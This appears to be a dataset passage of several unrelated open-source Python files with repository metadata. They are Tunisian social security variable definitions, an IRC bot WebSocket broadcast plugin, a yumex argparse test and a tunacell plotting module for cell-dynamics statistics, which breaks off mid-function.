rtfr = u"Régime des Travailleurs à Faibles Revenus (gens de maisons, travailleurs de chantiers, et artisans travaillant à la pièce)"
raci = u"Régime des Artistes, Créateurs et Intellectuels"
salarie_cnrps = u"Régime des salariés affilés à la Caisse Nationale de Retraite et de Prévoyance Sociale"
pensionne_cnrps = u"Régime des salariés des pensionnés de la Caisse Nationale de Retraite et de Prévoyance Sociale"
# references :
# http://www.social.gov.tn/index.php?id=49&L=0
# http://www.paie-tunisie.com/412/fr/83/reglementations/regimes-de-securite-sociale.aspx
class regime_securite_sociale(Variable):
value_type = Enum
possible_values = TypesRegimeSecuriteSociale
default_value = TypesRegimeSecuriteSociale.rsna
entity = Individu
label = u"Régime de sécurité sociale du retraité"
definition_period = YEAR
| agpl-3.0 | 1,448,309,942,262,466,300 | 31.26087 | 136 | 0.720575 | false | 2.65 | false | false | false |
Sulter/MASTERlinker | plugins/wsserver.py | 1 | 4384 | # Plugin that creates a websocket server, and feeds all the messages written to the connected clients
import includes.helpers as helpers
import socket
import re
import base64
import hashlib
import struct
import threading
import select
import logging
class wsserver(helpers.Plugin):
def __init__(self, parent):
super().__init__(parent)
self.server = WsServerThread(4446)
self.server.start()
def handle_pm(self, msg_data):
pass
def handle_message(self, msg_data):
self.server.send_msg_all(msg_data["nick"] + ":" + msg_data["message"]) # send msg and nick to listening sockets
class WsServerThread(threading.Thread):
def __init__(self, port):
# Make server (non-blocking socket)
self.sserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sserver.setblocking(0)
self.sserver.bind(("", port))
self.sserver.listen(5)
self.client_list = []
threading.Thread.__init__(self)
def send_msg_all(self, msg):
for sock in self.client_list:
self.send_msg(sock, msg)
def run(self):
while 1:
# We wait until we got something that is ready to read
ready_to_read, ready_to_write, in_error = select.select([self.sserver] + self.client_list, [],
[self.sserver] + self.client_list, 60)
if in_error:
print("ERROR! in sockets")
print(in_error)
for reader in ready_to_read:
if reader == self.sserver: # this will be true if there are sockets that can be accepted
clientsocket, address = self.sserver.accept()
if self.handshake(clientsocket) is True and len(
self.client_list) < 100: # only add socket to the list if the handshake succeeded AND we have less then 100 connections already!
self.client_list.append(clientsocket)
logging.debug("wsserver: connection accepted from: %s", str(address))
else: # one of the other sockets has a message for us, but we only check if it's empty, because that means the socket closed
m = ""
try:
m = reader.recv(4096)
except:
do_noting = 0
if len(m) < 1:
self.client_list.remove(reader)
reader.close()
def send_msg(self, sock, message):
# https://tools.ietf.org/html/rfc6455#page-28
length = len(message)
frame = "\x81" # The first byte setting the FIN bit to 1 and sending the opcode 0x1 that tells the clients the payload data is text
if length > 65025:
raise Exception("Error - payload to large")
elif length > 125:
frame = frame + chr(126)
frame = frame + struct.pack(">H", length) # here we add the hex representation of the length
frame = frame + message
else:
frame = frame + chr(length) + message
ready_to_read, ready_to_write, in_error = select.select([], [sock], [], 1)
if sock in ready_to_write:
try:
sock.sendall(frame)
except:
self.client_list.remove(sock)
sock.close()
def handshake(self, sock):
magic_string = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
# Get the header, but only if the socket has anything to say (otherwise just disgard it)
ready_to_read, ready_to_write, in_error = select.select([sock], [], [], 1)
if sock in ready_to_read:
header = sock.recv(4096)
else:
return False
# here we should probably add some more protocol checking stuff. But this should work with any real browsers (chromium/firefox, at least for now)
# make the key, using the key from the header and the magic string
key = re.search("(Sec-WebSocket-Key: )(\S+)", header)
if not key:
return False # return false if the client didn't provide a key
key = key.group(2)
key = key + magic_string
respond_key = base64.b64encode(hashlib.sha1(key).digest())
# Handshake
respond_message = "HTTP/1.1 101 Switching Protocols\r\n"
respond_message = respond_message + "Upgrade: websocket\r\n"
respond_message = respond_message + "Connection: Upgrade\r\n"
respond_message = respond_message + "Sec-WebSocket-Accept: %s\r\n\r\n" % respond_key
ready_to_read, ready_to_write, in_error = select.select([], [sock], [], 1) # make sure it's ready to write
if sock in ready_to_write:
sock.sendall(respond_message)
return True
else:
return False
| mit | -3,755,545,347,154,293,000 | 37.45614 | 149 | 0.646898 | false | 3.650291 | false | false | false |
timlau/yumex | src/test/argpase.py | 1 | 1127 | # need the python-argparse package installed
import argparse
# create the parser
main_parser = None
def setupParser():
global main_parser
base_parser = argparse.ArgumentParser(add_help=False)
parser = base_parser.add_argument_group('base options')
parser.add_argument("-d", "--debuglevel", dest="debuglevel", action="store", choices=xrange(10),
default=2, help="yum output level", type=int)
parser.add_argument("-e","--errorlevel", dest="errorlevel", action="store", choices=xrange(10),
default=2, help="yum error level", type=int)
main_parser = argparse.ArgumentParser(description='GUI for the yum package manager', parents = [base_parser])
subparsers = main_parser.add_subparsers()
cmds = ['install','remove']
# add a sub-command "install"
for c in cmds:
parser_cmd = subparsers.add_parser(c, help='%s a package' % c, parents = [base_parser])
parser_cmd.add_argument('package', nargs='*')
if __name__ == '__main__':
setupParser()
# parse the command line
args = main_parser.parse_args()
print args
| gpl-2.0 | 6,828,636,379,677,230,000 | 35.354839 | 113 | 0.64685 | false | 3.859589 | false | false | false |
LeBarbouze/tunacell | tunacell/plotting/dynamics.py | 1 | 34918 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
This module defines plotting functions for the statistics of the dynamics.
"""
from __future__ import print_function
import os
import numpy as np
import collections
import logging
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib import ticker
import matplotlib.gridspec as gridspec
from tunacell.filters.main import FilterSet
from tunacell.stats.single import Univariate, StationaryUnivariate
from tunacell.stats.two import StationaryBivariate
from tunacell.io import text
from .helpers import _set_axis_limits, _set_timelabel, _set_time_axis_ticks
# few variables that will be used through all functions
default_fontsize = mpl.rcParams['font.size']
default_lw = mpl.rcParams['lines.linewidth']
def _set_condition_list(univariate, show_cdts='master'):
"""Set the list of conditions to show
Parameters
----------
show_cdts : str or FilterSet or iterable on these (default 'master')
the conditions to plot, use 'all' for all conditions in univariate
univariate : Univariate instance
conditions will be matched against conditions stored in univariate
Returns
-------
list of FilterSet (conditions) to show
"""
conditions = ['master', ] # list of conditions to be plotted
if show_cdts == 'all':
conditions = ['master', ] + univariate.cset
elif show_cdts == 'master':
pass
elif isinstance(show_cdts, collections.Iterable):
for item in show_cdts:
_append_cdt(univariate, item, conditions)
else:
_append_cdt(univariate, show_cdts, conditions)
return conditions
def _append_cdt(univariate, this_cdt, cdt_list):
"""Append condition associated to this_cdt in univariate object to cdt_list
Parameters
----------
univariate : :class:`Univariate` instance
this_cdt : str or :class:`FilterSet` instance
either the condition instance or its string representation
cdt_list : list of conditions
list of conditions to append condition to
"""
found = False
if isinstance(this_cdt, str):
# find which
for cdt in univariate.cset:
# TODO : compare also cdt.label
if repr(cdt) == this_cdt:
found = True
break
elif isinstance(this_cdt, FilterSet):
for cdt in univariate.cset:
if repr(cdt) == repr(this_cdt):
found = True
break
if found:
cdt_list.append(cdt)
return
def plot_onepoint(univariate, show_cdts='all', show_ci=False,
mean_ref=None, var_ref=None,
axe_xsize=6., axe_ysize=2.,
time_range=(None, None),
time_fractional_pad=.1,
counts_range=(None, None),
counts_fractional_pad=.1,
average_range=(None, None), # auto
average_fractional_pad=.1,
variance_range=(None, None),
variance_fractional_pad=.1,
show_legend=True,
show_cdt_details_in_legend=False,
use_obs_name=None,
save=False, user_path=None, ext='.png',
verbose=False):
"""Plot one point statistics: counts, average, abd variance.
One point functions are plotted for each condition set up in *show_cdts*
argument: 'all' for all conditions, or the string representation (or label)
of a particuler condition (or a list thereof).
Parameters
----------
univariate : Univariate instance
show_cdts : str (default 'all')
must be either 'all', or 'master', or the repr of a condition, or a
list thereof
show_ci : bool {False, True}
whether to show 99% confidence interval
mean_ref : float
reference mean value: what user expect to see as sample average to
compare with data
var_ref : float
reference variance value: what user expect to see as sample variance to
compare with data
axe_xsize : float (default 6)
size of the x-axis (inches)
axe_ysize : float (default 2.)
size if a single ax y-axis (inches)
time_range : couple of floats (default (None, None))
specifies (left, right) bounds
time_fractional_pad : float (default .1)
fraction of x-range to add as padding
counts_range : couple of floats (default (None, None))
specifies range for the Counts y-axis
counts_fractional_pad : float (default .2)
fractional amount of y-range to add as padding
average_range : couple of floats (default (None, None))
sepcifies range for the Average y-axis
average_fractional_pad : couple of floats (default .2)
fractional amounts of range to padding
variance_range : couple of floats (default (None, None))
sepcifies range for the Variance y-axis
average_fractional_pad : couple of floats (default .2)
fractional amounts of range to padding
show_legend : bool {True, False}
print out legend
show_cdt_details_in_legend : bool {False, True}
show details about filters
use_obs_name : str (default None)
when filled, the plot title will use this observable name instead
of looking for the observable registered name
save : bool {False, True}
whether to save plot
user_path : str (default None)
user defined path where to save figure; default is canonical path
(encouraged)
ext : str {'.png', '.pdf'}
extension to be used when saving file
verbose : bool {False, True}
"""
if not isinstance(univariate, Univariate):
raise TypeError('Input is not {}'.format(Univariate))
fig, axs = plt.subplots(3, 1, figsize=(axe_xsize, 3*axe_ysize))
obs = univariate.obs
timelabel = _set_timelabel(obs) # define time label
main_handles = [] # main legend
ci_handles = [] # additional legend (TODO: check if necessary)
all_times = []
all_counts = []
all_average = []
all_variance = []
# build condition list
conditions = _set_condition_list(univariate, show_cdts)
for index, cdt in enumerate(conditions):
if cdt == 'master':
c_repr = 'master'
c_label = 'all samples'
lw = default_lw + 1
alpha = 1
alpha_fill = .5
else:
c_repr = repr(cdt)
if show_cdt_details_in_legend:
c_label = str(cdt)
else:
c_label = cdt.label
lw = default_lw
alpha = .8
alpha_fill = 0.3
ok = np.where(univariate[c_repr].count_one > 0)
times = univariate[c_repr].time[ok]
all_times.extend(times)
counts = univariate[c_repr].count_one[ok]
all_counts.extend(counts)
mean = univariate[c_repr].average[ok]
all_average.extend(mean)
var = univariate[c_repr].var[ok]
all_variance.extend(var)
std = univariate[c_repr].std[ok]
se = 2.58 * std / np.sqrt(counts) # standard error 99% CI Gaussian
# var = np.diagonal(univariate[c_repr].autocorr)
line_counts, = axs[0].plot(times, counts, alpha=alpha, lw=lw,
label='{}'.format(c_label))
main_handles.append(line_counts)
color = line_counts.get_color()
average, = axs[1].plot(times, mean, color=color, alpha=0.8, lw=lw, label=c_label)
if show_ci:
fill_std = axs[1].fill_between(times, mean-se, mean+se,
facecolor=color, alpha=alpha_fill)
ci_handles.append(fill_std)
all_average.extend(mean-se)
all_average.extend(mean+se)
variance, = axs[2].plot(times, var, color=color, alpha=0.8, lw=lw, label=c_label)
# adding reference lines
if mean_ref is not None:
mref = axs[1].axhline(mean_ref, ls='-.', color='C7', alpha=.7,
label='reference value')
main_handles.append(mref)
all_average.append(mean_ref)
if var_ref is not None:
vref = axs[2].axhline(var_ref, ls='-.', color='C7', alpha=.7,
label='reference value')
# check last label if meanèref has been saved
last_lab = main_handles[-1].get_label()
if last_lab != vref.get_label():
main_handles.append(vref)
all_variance.append(var_ref)
# print vertical line at tref
if obs.timing != 'g' and isinstance(obs.tref, float):
for ax in axs:
vtref = ax.axvline(univariate.obs.tref, color='C7', ls='--',
alpha=.5, label='reference time in obs')
main_handles.append(vtref) # only the last one
# ## limits and ticks ##
# xaxis
for ax in axs:
left, right = _set_axis_limits(ax, all_times, which='x', pad=time_fractional_pad,
force_range=time_range)
# locator
locator = _set_time_axis_ticks(axs[0], obs, bounds=(left, right))
for ax in axs:
ax.xaxis.set_major_locator(locator)
# yaxis limits
_set_axis_limits(axs[0], all_counts, which='y', pad=counts_fractional_pad,
force_range=counts_range)
axs[0].yaxis.set_major_locator(ticker.MaxNLocator(nbins=3, integer=True))
# average
_set_axis_limits(axs[1], all_average, which='y', pad=average_fractional_pad,
force_range=average_range)
axs[1].yaxis.set_major_locator(ticker.MaxNLocator(nbins=3))
# variance
_set_axis_limits(axs[2], all_variance, which='y', pad=variance_fractional_pad,
force_range=variance_range)
axs[2].yaxis.set_major_locator(ticker.MaxNLocator(nbins=3))
# tick formatter
formatter = ticker.ScalarFormatter(useMathText=True, useOffset=False)
formatter.set_powerlimits((-2, 4))
for ax in axs:
ax.yaxis.set_major_formatter(formatter)
t = ax.yaxis.get_offset_text()
plt.draw()
msg = t.get_text()
ax.text(0, .95, msg, ha='left', va='top', transform=ax.transAxes)
t.set_visible(False)
axs[0].tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
axs[1].tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
axs[2].set_xlabel(timelabel, x=.95, horizontalalignment='right',
fontsize='medium')
# hide intermediate x axis
for ax in axs[:2]:
ax.spines['bottom'].set_visible(False)
ax.tick_params(axis='x', colors='C7')
for ax in axs[1:]:
ax.spines['top'].set_color('C7')
axs[0].set_ylabel('Counts', fontsize='medium')
axs[1].set_ylabel('Average', fontsize='medium')
axs[2].set_ylabel('Variance', fontsize='medium')
# ## legend ##
# C.I.
if ci_handles:
ci = ci_handles[0]
# ci.set_color('C7')
ci.set_label('.99 C.I.')
main_handles.append(ci)
handles = main_handles[:]
labels = [h.get_label() for h in handles]
if show_legend:
axs[-1].legend(handles=handles, labels=labels, loc='upper left',
bbox_to_anchor=(0, -.5/axe_ysize))
# title
latex_obs = obs.latexify(use_name=use_obs_name)
axs[0].text(0.5, 1+.2/axe_ysize,
r'{}'.format(latex_obs),
size='large',
horizontalalignment='center',
verticalalignment='bottom',
transform=axs[0].transAxes)
fig.subplots_adjust(hspace=0)
if save:
univ = univariate
try:
obs_path = univ._get_obs_path(user_root=user_path, write=False)
except text.MissingFolderError:
# it means data has not been written yet
# export data and then get
univ.export_text(analysis_folder=user_path)
obs_path = univ._get_obs_path(user_root=user_path, write=False)
bname = 'plot_onepoint_' + univ.obs.name + '_' + univ.region.name + ext
fname = os.path.join(obs_path, bname)
fig.savefig(fname, bbox_inches='tight', pad_inches=0)
if verbose:
print('Figure saved as {}'.format(fname))
return fig
def plot_twopoints(univariate, condition_label=None, trefs=[], ntrefs=4,
axe_xsize=6., axe_ysize=2.,
time_range=(None, None),
time_fractional_pad=.1,
counts_range=(None, None),
counts_fractional_pad=.1,
corr_range=(None, None), # auto
corr_fractional_pad=.1,
delta_t_max=None,
show_exp_decay=None,
show_legend=True,
show_cdt_details_in_legend=False,
use_obs_name=None,
save=False, ext='.png', verbose=False):
"""Plot two-point functions: counts and autocorrelation functions.
These plots are able to show only one extra condition with 'master', and
are plotted for a set of time of references.
Parameters
----------
univariate : :class:`Univariate` instance
condition_label : str (default None)
must be the repr of a given FilterSet
trefs : flist of floats
indicate the times that you would like to have as references
if left empty, reference times will be computed automatically
ntrefs : int
if trefs is empty, number of times of reference to display
axe_xsize : float (default 6)
size of the x-axis (inches)
axe_ysize : float (default 2.)
size if a single ax y-axis (inches)
time_range : couple of floats (default (None, None))
specifies (left, right) bounds
time_fractional_pad : float (default .1)
fraction of x-range to add as padding
counts_range : couple of floats (default (None, None))
specifies range for the Counts y-axis
counts_fractional_pad : float (default .2)
fractional amount of y-range to add as padding
corr_range : couple of floats (default (None, None))
sepcifies range for the Average y-axis
corr_fractional_pad : couple of floats (default .2)
fractional amounts of range to padding
delta_t_max : float (default None)
when given, bottom plot will be using this max range symmetrically;
otherwise, will use the largest intervals found in data (often too
large to see something)
show_exp_decay : float (default None)
when a floating point number is passed, a light exponential decay
curve is plotted for each tref
show_legend : bool {True, False}
print out legend
show_cdt_details_in_legend : bool {False, True}
show details about filters
use_obs_name : str (default None)
when filled, the plot title will use this observable name instead
of looking for the observable registered name
save : bool {False, True}
whether to save figure at canonical path
ext : str {'.png', '.pdf'}
extension to be used when saving figure
verbose : bool {False, True}
"""
obs = univariate.obs
timelabel = _set_timelabel(obs) # define time label
# get priod from eval times
if len(univariate.eval_times) > 0:
period = univariate.eval_times[1] - univariate.eval_times[0]
# or from experiment metadata
else:
period = univariate.exp.period
fig, axs = plt.subplots(3, 1, figsize=(axe_xsize, 3*axe_ysize))
# choice of index/indices for time of reference
times = univariate['master'].time
npoints = len(times)
if not trefs:
logging.info('Determining trefs...')
di = npoints // ntrefs + 1
indices = np.arange(0, npoints, di, dtype=int)
trefs = times[indices]
logging.info(trefs)
all_times = []
all_counts = []
all_corr = []
handles = []
# prep work for latex printing
latex_ref = '{{\mathrm{{ref}}}}'
if obs.timing == 'g':
prefix = 'g'
units = ''
else:
prefix = 't'
units = 'mins'
conditions = ['master', ] + univariate.cset
for index, cdt in enumerate(conditions):
if cdt == 'master':
c_repr = 'master'
c_label = 'all samples'
lw = default_lw + 1
lt = '-'
alpha = .8
elif cdt.label == condition_label or str(cdt) == condition_label or repr(cdt) == condition_label:
c_repr = repr(cdt)
if show_cdt_details_in_legend:
c_label = str(cdt)
else:
c_label = cdt.label
lw = default_lw
lt = '--'
alpha = .6
# we plot master and one condition if given, not more...
else:
continue
times = univariate[c_repr].time
counts = univariate[c_repr].count_two
corr = univariate[c_repr].autocorr
var = np.diagonal(corr)
valid = counts != 0
for tref in trefs:
# this tref may not be in conditioned data (who knows)
if np.amin(np.abs(times - tref)) > period:
continue
index = np.argmin(np.abs(times - tref))
if obs.timing == 'g':
lab = '{:d}'.format(tref)
else:
lab = '{:.0f}'.format(tref)
line_label = r'$ {}_{} = {}$ {} ({})'.format(prefix, latex_ref, lab, units, c_label)
ok = np.where(counts[index, :] > 0)
# if len(ok[0]) == 0:
# continue
# time limits
all_times.extend(times[ok])
dat, = axs[0].plot(times[ok], counts[index, :][ok],
ls=lt, lw=lw, alpha=alpha, label=line_label)
handles.append(dat)
all_counts.extend(counts[index, :][ok])
color = dat.get_color()
axs[0].plot((tref, tref), (0, counts[index, index]),
ls=':', color=color)
axs[1].axhline(0, ls='-', color='C7', alpha=.3) # thin line at 0
dat, = axs[1].plot(times[valid[index, :]],
corr[index, :][valid[index, :]]/var[index],
ls=lt, lw=lw, alpha=alpha)
all_corr.extend(corr[index, :][valid[index, :]]/var[index])
color = dat.get_color()
axs[1].axvline(tref, ymin=0.1, ymax=0.9, ls=':', color=color)
axs[2].axhline(0, ls='-', color='C7', alpha=.3) # thin line at 0
axs[2].plot(times[valid[index, :]] - tref,
corr[index, :][valid[index, :]]/var[index], ls=lt, lw=lw, alpha=alpha)
# ## limits and ticks ##
# xaxis
for ax in axs[:2]:
left, right = _set_axis_limits(ax, all_times, which='x',
pad=time_fractional_pad,
force_range=time_range)
hrange = right - left
ax.xaxis.set_major_locator(ticker.MaxNLocator(integer=True))
# bottom plot : try to zoom over provided range
if delta_t_max is not None:
axs[2].set_xlim(left=-delta_t_max, right=delta_t_max)
# if not provided, compute automatic ranges (not pretty usually)
else:
axs[2].set_xlim(left=-hrange, right=hrange)
axs[2].xaxis.set_major_locator(ticker.MaxNLocator(integer=True))
# add exponential decay
if show_exp_decay is not None:
tt = np.linspace(left, right, 100)
dd = np.linspace(-hrange, hrange, 100)
lab = r'$t_{{\mathrm{{decay}}}} = {:.1f}$ {}'.format(1./show_exp_decay, units)
for tref in trefs:
axs[1].plot(tt, np.exp(-show_exp_decay * np.abs(tt - tref)),
ls='-.', color='C7', alpha=.7)
dec, = axs[2].plot(dd, np.exp(-show_exp_decay * np.abs(dd)),
ls='-.', color='C7', alpha=.7, label=lab)
all_corr.extend(np.exp(-show_exp_decay * np.abs(dd)))
handles.append(dec)
# ## yaxis limits ##
# counts
_set_axis_limits(axs[0], all_counts, which='y', pad=counts_fractional_pad,
force_range=counts_range)
axs[0].yaxis.set_major_locator(ticker.MaxNLocator(nbins=3, integer=True))
# corr
for ax in axs[1:]:
_set_axis_limits(ax, all_corr, which='y', pad=corr_fractional_pad,
force_range=corr_range)
ax.yaxis.set_major_locator(ticker.MaxNLocator(nbins=3))
# legend
labels = [h.get_label() for h in handles]
axs[-1].legend(handles=handles, labels=labels, loc='upper left',
bbox_to_anchor=(0, -.5/axe_ysize), labelspacing=0.2) # reduce labelspacing because of LaTeX
formatter = ticker.ScalarFormatter(useMathText=True, useOffset=False)
formatter.set_powerlimits((-2, 4))
for ax in axs:
ax.yaxis.set_major_formatter(formatter)
t = ax.yaxis.get_offset_text()
plt.draw()
msg = t.get_text()
ax.text(0, .95, msg, ha='left', va='top', transform=ax.transAxes)
t.set_visible(False)
axs[0].tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
axs[1].tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
axs[2].set_xlabel(timelabel, x=.95, horizontalalignment='right',
fontsize='medium')
# hide intermediate x axis
for ax in axs[:1]:
ax.spines['bottom'].set_visible(False)
ax.tick_params(axis='x', colors='C7')
for ax in axs[1:2]:
ax.spines['top'].set_color('C7')
# ylabels
axs[0].set_ylabel(r'# $\langle t_{\mathrm{ref}} | t \rangle$',
fontsize='medium')
axs[1].set_ylabel(r'$a(t_{\mathrm{ref}}, t)$',
fontsize='medium')
axs[2].set_ylabel(r'$a(t_{\mathrm{ref}}, t- t_{\mathrm{ref}})$',
fontsize='medium')
# title
latex_obs = obs.latexify(use_name=use_obs_name)
axs[0].text(0.5, 1+.2/axe_ysize,
r'{}'.format(latex_obs),
size='large',
horizontalalignment='center',
verticalalignment='bottom',
transform=axs[0].transAxes)
fig.subplots_adjust(hspace=0.)
# save fig at canonical path
if save:
# export data files if not existing yet
try:
obs_path = univariate._get_obs_path(write=False)
except text.MissingFolderError:
univariate.write_text()
if condition_label is None:
univc = univariate.master
else:
univc = univariate[condition_label]
cdt_path = univc._get_path()
bname = 'plot_twopoints_' + obs.name + '_' + univariate.region.name + ext
fname = os.path.join(cdt_path, bname)
fig.savefig(fname, bbox_inches='tight', pad_inches=0)
if verbose:
print('Figure saved as {}'.format(fname))
return fig
def plot_stationary(stationary, show_cdts='all',
axe_xsize=6., axe_ysize=2.,
time_range=(None, None),
time_fractional_pad=.1,
time_guides=[0., ],
counts_range=(None, None),
counts_fractional_pad=.1,
corr_range=(None, None), # auto
counts_logscale=False,
corr_fractional_pad=.1,
corr_logscale=False,
corr_guides=[0., ],
show_exp_decay=None,
show_legend=True, show_cdt_details_in_legend=False,
use_obs_name=None,
save=False, ext='.png', verbose=False):
"""Plot stationary autocorrelation.
Parameters
----------
stationary : StationaryUnivariate or StationaryBivariate instance
axe_xsize : float (default 6)
size (in inches) of the x-axis
axe_ysize : float (default 2)
size (in inches) of the individual y-axis
time_range : couple of floats
bounds for time (x-axis)
time_fractional_pad : float
fractional padding for x-axis
counts_range : couple of ints
bounds for counts axis
counts_fractional_pad : float
fractional padding for counts axis
corr_range : couple of floats
bounds for correlation values
counts_logscale : bool {False, True}
use logscale for counts axis
corr_fractional_pad : float
fractional padding for correlation values
corr_logscale : bool {False, True}
use logscale for correlation values (symlog is used to display
symmetrically negative values)
corr_guides : list of float
values where to plot shaded grey horizontal lines
show_exp_decay : float (default None)
whether to plot an exponential decay with corresponding rate
exp(-rate * t)
save : bool {False, True}
whether to save plot at canonical path
use_obs_name : str (default None)
when filled, the plot title will use this observable name instead
of looking for the observable registered name
ext : str {'.png', '.pdf'}
extension used for file
Returns
-------
fig : Figure instance
"""
if not (isinstance(stationary, StationaryUnivariate) or
isinstance(stationary, StationaryBivariate)):
msg = ('Input is not an instance of '
'{}'.format(StationaryUnivariate) + 'or of '
'{}'.format(StationaryBivariate))
raise TypeError(msg)
if isinstance(stationary, StationaryUnivariate):
obs = stationary.obs
timelabel = _set_timelabel(obs, use_tref=False)
elif isinstance(stationary, StationaryBivariate):
obs = [uni.obs for uni in stationary.univariates]
timelabel = _set_timelabel(obs[0], use_tref=False)
if 'minutes' in timelabel:
units = 'mins'
prefix = 't'
else:
units = '' # generations are used
prefix = 'g'
timelabel = r'$\Delta$'+timelabel
nplots = 2
fig = plt.figure(figsize=(axe_xsize, (nplots + 1)*axe_ysize))
gs = gridspec.GridSpec(nplots + 1, 1)
ax1 = fig.add_subplot(gs[0])
ax2 = fig.add_subplot(gs[1:])
# build condition list
if isinstance(stationary, StationaryUnivariate):
conditions = _set_condition_list(stationary.univariate, show_cdts=show_cdts)
elif isinstance(stationary, StationaryBivariate):
conditions = []
conditions_0 = _set_condition_list(stationary.univariates[0], show_cdts=show_cdts)
conditions_1 = _set_condition_list(stationary.univariates[1], show_cdts=show_cdts)
# intersect
for cdt in conditions_0:
if cdt in conditions_1:
conditions.append(cdt)
all_times = []
all_counts = []
all_corrs = []
main_handles = [] # for legend
ci_handles = []
for index, cdt in enumerate(conditions):
if cdt == 'master':
c_repr = 'master'
c_label = 'all samples'
lw = default_lw + 1
alpha = 1
alpha_fill = .5
else:
c_repr = repr(cdt)
if show_cdt_details_in_legend:
c_label = str(cdt)
else:
c_label = cdt.label
lw = default_lw
alpha = .8
alpha_fill = 0.3
array = stationary[c_repr].array
nonzero = np.where(array['counts'] > 1) # 1 sample does not have std
dts = array['time_interval'][nonzero]
all_times.extend(dts)
counts = array['counts'][nonzero]
all_counts.extend(counts)
if isinstance(stationary, StationaryUnivariate):
corr = array['auto_correlation'][nonzero]
else:
corr = array['cross_correlation'][nonzero]
try:
dev = array['std_dev'][nonzero]
except ValueError:
dev = None
# counts
label = '{}'.format(c_label)
line, = ax1.plot(dts, counts, lw=lw, alpha=alpha, label=label)
main_handles.append(line)
col = line.get_color() # usefule for later stage
# autocorrelation: divide by variance
if isinstance(stationary, StationaryUnivariate):
norm = corr[0]
# cross-correlation: divide covariance by product of standard devs
elif isinstance(stationary, StationaryBivariate):
prod = 1.
for single in stationary.univariates:
prod *= np.sqrt(single[c_repr].stationary.autocorr[0])
norm = prod
dat, = ax2.plot(dts, corr/norm, color=col,
lw=lw, alpha=alpha, label=label)
all_corrs.extend(corr/norm)
if dev is not None:
se = 2.58 * dev / np.sqrt(counts)
ci = ax2.fill_between(dts, (corr-se)/norm, (corr+se)/norm,
facecolor=col, alpha=alpha_fill,
label='.99 C.I.')
ci_handles.append(ci)
all_corrs.extend((corr-se)/norm)
all_corrs.extend((corr+se)/norm)
# vertical lines for timing
for val in time_guides:
ax2.axvline(val, ls=':', color='C7', alpha=.5)
# horizontal lines for correlation ref
for val in corr_guides:
ax2.axhline(val, ls=':', color='C7', alpha=.5)
# ## limits and ticks ##
# xaxis
for ax in [ax1, ax2]:
left, right = _set_axis_limits(ax, all_times, which='x',
pad=time_fractional_pad,
force_range=time_range)
ax.xaxis.set_major_locator(ticker.MaxNLocator(integer=True))
if show_exp_decay is not None:
tt = np.linspace(left, right, 100)
yy = np.exp(-show_exp_decay*np.abs(tt))
lab = r'${}_{{\mathrm{{decay}}}} = {:.1f}$ {}'.format(prefix, 1./show_exp_decay, units)
ref, = ax2.plot(tt, yy, '-.', color='C7', alpha=1,
label=lab)
main_handles.append(ref)
# ## yaxis limits ##
# counts
formatter = ticker.ScalarFormatter(useMathText=True, useOffset=False)
formatter.set_powerlimits((-2, 4))
if not counts_logscale:
_set_axis_limits(ax1, all_counts, which='y', pad=counts_fractional_pad,
force_range=counts_range)
ax1.yaxis.set_major_locator(ticker.MaxNLocator(nbins=3, integer=True))
ax1.yaxis.set_major_formatter(formatter)
t = ax.yaxis.get_offset_text()
plt.draw()
msg = t.get_text()
ax1.text(0, .95, msg, ha='left', va='top', transform=ax.transAxes)
t.set_visible(False)
else:
ax1.set_yscale('symlog', linthresh=1)
# corr
if not corr_logscale:
bottom, top = _set_axis_limits(ax2, all_corrs, which='y',
pad=corr_fractional_pad,
force_range=corr_range)
if top > 2 or bottom < -2:
locator = ticker.MaxNLocator(nbins=5, integer=True)
else:
locator = ticker.FixedLocator([-1, -.5, 0., .5, 1])
ax2.yaxis.set_major_locator(locator)
ax2.yaxis.set_major_formatter(formatter)
t = ax.yaxis.get_offset_text()
plt.draw()
msg = t.get_text()
ax2.text(0, .95, msg, ha='left', va='top', transform=ax.transAxes)
t.set_visible(False)
else:
ax2.set_yscale('symlog', linthreshy=0.1, linscaley=0.2,
subsy=[2, 3, 4, 5, 6, 7, 8, 9])
if corr_range[0] is not None and corr_range[0] > 0.:
ax2.set_ylim(bottom=corr_range[0])
ax1.tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
ax2.set_xlabel(timelabel, x=.95, horizontalalignment='right',
fontsize='medium')
# hide intermediate x axis
ax1.spines['bottom'].set_visible(False)
ax1.tick_params(axis='x', colors='C7')
ax2.spines['top'].set_color('C7')
# ylabels
ax1.set_ylabel(r'Counts', fontsize='medium')
if isinstance(stationary, StationaryUnivariate):
ax2.set_ylabel(r'$\tilde{{a}}(\Delta {})$'.format(prefix), fontsize='medium')
elif isinstance(stationary, StationaryBivariate):
ax2.set_ylabel(r'$\tilde{{c}}(\Delta {})$'.format(prefix), fontsize='medium')
# writting observable
# case: obs is a single observable
if isinstance(stationary, StationaryUnivariate):
msg = '{}:{}'.format(obs.latexify(shorten_time_variable=True, use_name=use_obs_name),
obs.latexify(plus_delta=True, shorten_time_variable=True, use_name=use_obs_name))
# case: obs is a couple of observables
else:
if use_obs_name is not None:
if isinstance(use_obs_name, str):
use_name_0 = use_obs_name
use_name_1 = None
else:
if len(use_obs_name) == 1:
use_name_0 = use_obs_name[0]
use_name_1 = None
else:
use_name_0 = use_obs_name[0]
use_name_1 = use_obs_name[1]
else:
use_name_0 = None
use_name_1 = None
msg = '{}:{}'.format(obs[0].latexify(shorten_time_variable=True,
use_name=use_name_0),
obs[1].latexify(plus_delta=True, shorten_time_variable=True,
use_name=use_name_1))
ax1.text(0.5, 1+.2/axe_ysize, r'{}'.format(msg),
size='large',
horizontalalignment='center',
verticalalignment='bottom',
transform=ax1.transAxes)
# ## legend ##
# C.I.
if ci_handles:
ci = ci_handles[0]
# ci.set_color('C7')
ci.set_label('.99 C.I.')
main_handles.append(ci)
handles = main_handles[:]
labels = [h.get_label() for h in handles]
if show_legend:
ax2.legend(handles=handles, labels=labels, loc='upper left',
bbox_to_anchor=(0, -.25/axe_ysize), labelspacing=.2)
fig.subplots_adjust(hspace=0)
if save:
# get univariate instance to get path where to save figure
bname = 'plot_stationary_'
try:
